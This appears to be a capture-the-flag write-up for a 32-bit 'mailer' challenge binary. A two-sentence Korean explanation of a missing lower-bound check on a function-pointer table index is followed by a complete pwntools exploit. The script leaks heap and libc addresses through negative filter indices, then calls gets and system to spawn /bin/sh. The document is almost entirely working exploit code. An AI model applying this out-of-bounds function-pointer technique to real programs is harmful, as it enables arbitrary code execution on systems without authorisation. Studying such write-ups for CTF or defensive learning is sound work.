취약점은 post에서 filter를 선택할 때 발생한다. 인덱스에 하한 검사가 없어 음수를 입력할 수 있고, 그러면 filter 테이블 밖의 임의 주소에 있는 값이 함수 포인터로 호출되므로 원하는 함수를 실행시킬 수 있다. : )
이 부분을 이용해 heap/libc 주소를 leak하고, gets와 system을 차례로 호출해 /bin/sh까지 실행할 수 있다.
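from pwn import *

# Exploit for "mailer" (32-bit).  The filter index given to `post` is used to
# fetch a function pointer from a table with no lower-bound check, so a
# negative (wrapped) index makes the program call whatever 4-byte value sits
# at an attacker-chosen address.  Every address and offset below is tied to
# the provided binary and libc.so.6 (and to the heap layout observed with
# them); recompute all of them for a different build.

# Address the filter index is applied to (presumably the filter-pointer table
# in the binary): the program reads its pointer from
# FILTER_TABLE + 4 * index, taken modulo 2**32.
FILTER_TABLE = 0x0804B048
# Distance of the first leaked heap pointer from the heap base, and of the
# leaked libc pointer from the libc base, as observed for this setup.
HEAP_LEAK_OFF = 0x168
LIBC_LEAK_OFF = 0x1b2cc0
# Heap offsets (from heap_base) at which the p32(gets) + p32(system) mail's
# contents end up, as observed for this setup.
GETS_PTR_OFF = 0x12d0
SYSTEM_PTR_OFF = 0x12d4

s = process("./mailer")
elf = ELF("./mailer")
libc = ELF("./libc.so.6")


def add(content):
    """Menu 1: create a mail whose contents are `content` (bytes)."""
    s.sendlineafter(b"> ", b"1")
    s.sendlineafter(b"contents: ", content)


def delete(index):
    """Menu 2: delete the mail at `index`."""
    s.sendlineafter(b"> ", b"2")
    s.sendlineafter(b":", str(index).encode())


def post(index, filter_index):
    """Menu 3: post mail `index` through filter `filter_index`.

    `filter_index` is sent as-is, so a negative value reaches the program
    unchecked -- that is the bug this exploit relies on.
    """
    s.sendlineafter(b"> ", b"3")
    s.sendlineafter(b":", str(index).encode())
    s.sendlineafter(b">", str(filter_index).encode())


def filter_index_for(addr):
    """Return the wrapped (negative) filter index that points at `addr`.

    FILTER_TABLE + 4 * index must equal `addr` modulo 2**32, so the index is
    derived from the difference minus 2**32.  `//` keeps the result an int
    on Python 3; on Python 2 it is exactly what `/` did on ints.
    """
    return (addr - FILTER_TABLE - 0x100000000) // 4


def leak_u32(skip):
    """Discard `skip` bytes of the post output and return the next 4 as u32.

    recvn() blocks until exactly n bytes arrived; recv(n) may return fewer
    on a fragmented read, which would misalign the leak and make u32() raise.
    """
    s.recvn(skip)
    return u32(s.recvn(4))


# --- Stage 1: leak a heap pointer ----------------------------------------
# Mail 0 starts with a code address of the binary followed by padding (kept
# from the original exploit; what that address is used for is not visible
# here).  Filter -7 prints data that contains a heap pointer 5 bytes in.
add(p32(0x08048D01) + b"A" * 8)
post(0, 0)
post(0, -7)
heap_leak = leak_u32(5)
print("heap_leak : " + hex(heap_leak))
heap_base = heap_leak - HEAP_LEAK_OFF
print("heap_base : " + hex(heap_base))

# --- Stage 2: leak a libc pointer ----------------------------------------
# Re-create mail 0 with 52 bytes of padding; the 4 bytes printed right after
# the contents (53 bytes in, counting the prompt byte) are a libc pointer.
delete(0)
add(b"A" * 52)
post(0, -4)
post(0, -7)
leak = leak_u32(53)
print("leak : " + hex(leak))
libc_base = leak - LIBC_LEAK_OFF
print("libc_base : " + hex(libc_base))

system = libc_base + libc.symbols['system']
gets = libc_base + libc.symbols['gets']
print("system : " + hex(system))
print("gets : " + hex(gets))

# --- Stage 3: call gets() then system() through the out-of-bounds index --
post(0, filter_index_for(heap_leak))
# Mail holding the two libc pointers that the wrapped indices below select.
add(p32(gets) + p32(system))
post(0, 0)
# Presumably the filter is invoked on the mail contents, so gets() overwrites
# them with "/bin/sh" and system() then runs that string -- confirm against
# the binary if the final call does not land a shell.
post(0, filter_index_for(heap_base + GETS_PTR_OFF))
s.sendline(b"/bin/sh\x00")
post(0, filter_index_for(heap_base + SYSTEM_PTR_OFF))
s.interactive()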